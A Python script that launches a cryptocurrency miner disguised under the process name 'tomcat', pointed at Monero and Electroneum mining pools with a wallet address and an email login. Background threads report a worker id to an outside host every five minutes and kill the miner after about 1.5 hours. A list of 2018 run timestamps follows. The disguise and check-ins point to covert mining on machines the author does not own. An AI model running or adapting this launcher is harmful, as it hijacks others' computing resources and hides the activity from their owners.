import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:32:05.610388
#2018-02-17 17:20:07.895643
#2018-02-17 19:08:04.953074
#2018-02-17 20:58:04.014936
#2018-02-17 22:43:07.007655
#2018-02-18 00:27:03.519981
#2018-02-18 02:18:05.494166
#2018-02-18 04:05:06.571260
#2018-02-18 05:56:06.799168
#2018-02-18 07:46:01.480528
#2018-02-18 09:34:03.660569
#2018-02-18 11:20:05.631519
#2018-02-18 13:05:08.475026
#2018-02-18 14:53:05.528580
#2018-02-18 16:40:07.680275
#2018-02-18 18:29:05.084428
#2018-02-18 20:17:05.970997
#2018-02-18 22:02:06.007596
#2018-02-18 23:51:04.352701
#2018-02-19 01:37:07.625195
#2018-02-19 03:25:05.408642
#2018-02-19 05:10:09.144979
#2018-02-19 06:55:07.948599
#2018-02-19 08:44:01.496858
#2018-02-19 10:33:05.209200
#2018-02-19 12:21:03.890491
#2018-02-19 14:08:05.606053
#2018-02-19 15:57:06.644072
#2018-02-19 17:44:09.272656
#2018-02-19 19:33:03.229762
#2018-02-19 21:22:06.886183
#2018-02-19 23:08:05.960449
#2018-02-20 00:55:05.889367
#2018-02-20 02:43:01.915829
#2018-02-20 04:31:07.986727
#2018-02-20 06:15:05.724822
#2018-02-20 08:00:08.978829
#2018-02-20 09:46:07.872244
#2018-02-20 11:30:12.406997
#2018-02-20 13:18:09.005893
#2018-02-20 15:04:05.429719
#2018-02-20 16:48:05.510905
#2018-02-20 18:37:06.245639
#2018-02-20 20:29:07.160047
#2018-02-20 22:14:08.420882
#2018-02-20 23:56:05.343779
#2018-02-21 01:41:01.232590
#2018-02-21 03:28:08.166217
#2018-02-21 05:16:06.122542
#2018-02-21 07:04:05.884105
#2018-02-21 08:49:07.067416
#2018-02-21 10:37:04.258333
#2018-02-21 12:24:08.403905
#2018-02-21 14:10:09.631186
#2018-02-21 15:55:01.337074
#2018-02-21 17:48:02.226779
#2018-02-21 19:37:10.172740
#2018-02-21 21:24:04.219640
#2018-02-21 23:09:07.395683
#2018-02-22 00:58:07.580170
#2018-02-22 02:46:04.347676
#2018-02-22 04:32:07.475475
#2018-02-22 06:17:01.475131
#2018-02-22 08:02:04.587333
#2018-02-22 09:50:07.948552
#2018-02-22 11:34:08.810326
#2018-02-22 13:21:05.237527
#2018-02-22 15:11:04.247999
#2018-02-22 16:54:08.166468
#2018-02-22 18:43:08.242845
#2018-02-22 20:36:06.740743
#2018-02-22 22:21:05.906746
#2018-02-23 00:08:01.782649
#2018-02-23 01:56:01.888724
#2018-02-23 03:43:01.837281
#2018-02-23 05:27:03.268480
#2018-02-23 07:13:06.837442
#2018-02-23 09:18:07.873184
#2018-02-23 11:23:04.059445
#2018-02-23 13:13:07.465256
#2018-02-23 14:58:02.082019
#2018-02-23 16:48:07.208483
#2018-02-23 18:30:10.985690
#2018-02-23 20:14:05.102439
#2018-02-23 22:03:05.703177
#2018-02-23 23:51:01.775033
#2018-02-24 01:42:01.936475
#2018-02-24 03:33:04.278885
#2018-02-24 05:17:05.090397
#2018-02-24 07:05:03.602385
#2018-02-24 08:52:05.063028
#2018-02-24 10:53:06.989847
#2018-02-24 12:41:07.488700
#2018-02-24 14:29:03.672090
#2018-02-24 16:17:01.995403
#2018-02-24 18:09:07.991962
#2018-02-24 19:56:04.433300
#2018-02-24 21:40:01.516961
#2018-02-25 00:30:10.115314
#2018-02-25 03:32:01.524277
#2018-02-25 07:13:04.673097